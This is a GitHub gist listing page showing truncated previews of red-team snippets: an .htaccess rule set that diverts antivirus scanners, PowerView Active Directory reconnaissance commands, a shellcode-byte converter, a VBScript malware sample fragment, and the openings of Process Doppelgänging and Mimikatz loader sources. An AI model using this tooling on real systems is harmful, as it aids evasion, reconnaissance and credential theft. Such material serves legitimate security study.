Skip to content

Instantly share code, notes, and snippets.

@sunnyneo
sunnyneo / Inject.cs
Created April 30, 2018 18:51
DotNetToJScript Build Walkthrough
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
@sunnyneo
sunnyneo / .htaccess
Created May 4, 2018 13:07 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
RewriteCond expr "-R '54.0.0.0/8'" [OR]
RewriteCond expr "-R '52.0.0.0/8'" [OR]
@sunnyneo
sunnyneo / PowerView-3.0-tricks.ps1
Created September 9, 2018 03:05 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@sunnyneo
sunnyneo / PowerView-2.0-tricks.ps1
Created September 9, 2018 03:05 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
import binascii
import sys
file_name = sys.argv[1]
with open (file_name) as f:
hexdata = binascii.hexlify(f.read())
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
shellcode += "0x{},".format(i)
import binascii
import sys
file_name = sys.argv[1]
with open (file_name) as f:
hexdata = binascii.hexlify(f.read())
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
shellcode += "0x{},".format(i)
## Uploaded by @JohnLaTwC
## Sample hash: fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
On Error Resume Next
Dim objShell : Set objShell = CreateObject("WScript.Shell")
If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then
For Each vArg In WScript.Arguments
sArgs = sArgs & " """ & vArg & """"
Next
objShell.Run("cmd.exe /k cscript.exe //nologo " & Chr(34) & WScript.ScriptFullName & Chr(34) & sArgs & " && exit")
@sunnyneo
sunnyneo / inject.c
Created July 24, 2019 07:33 — forked from hfiref0x/inject.c
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
@sunnyneo
sunnyneo / Tasks.cs
Created August 3, 2019 06:03
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
@sunnyneo
sunnyneo / Tasks.cs
Created August 3, 2019 06:03
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*